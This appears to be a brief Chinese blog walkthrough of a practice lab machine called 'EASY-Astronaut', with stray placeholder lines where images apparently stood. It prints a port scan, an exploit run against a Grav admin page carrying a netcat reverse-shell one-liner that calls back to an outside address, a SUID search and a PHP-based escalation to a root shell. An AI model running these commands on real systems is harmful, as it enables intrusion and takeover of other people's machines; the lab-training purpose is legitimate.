EASY-Astronaut

目标:

192.168.121.12

信息收集:

./rustscan -a 192.168.121.12 --scripts none -r 1-65535
0
 
0

Cat flag:

python3 exploit.py -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.179 80 >/tmp/f' -t http://192.168.121.12/grav-admin
 
0
 
0
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
0
在网址找一下对应的提取poc:
0
/usr/bin/php7.4 -r "pcntl_exec('/bin/sh', ['-p']);"
cat /root/proof.txt
00300cae34e4ed01c71b8a02feea9cde

 

 
0
 
posted @ 2025-05-18 15:08  铺哩  阅读(24)  评论(0)    收藏  举报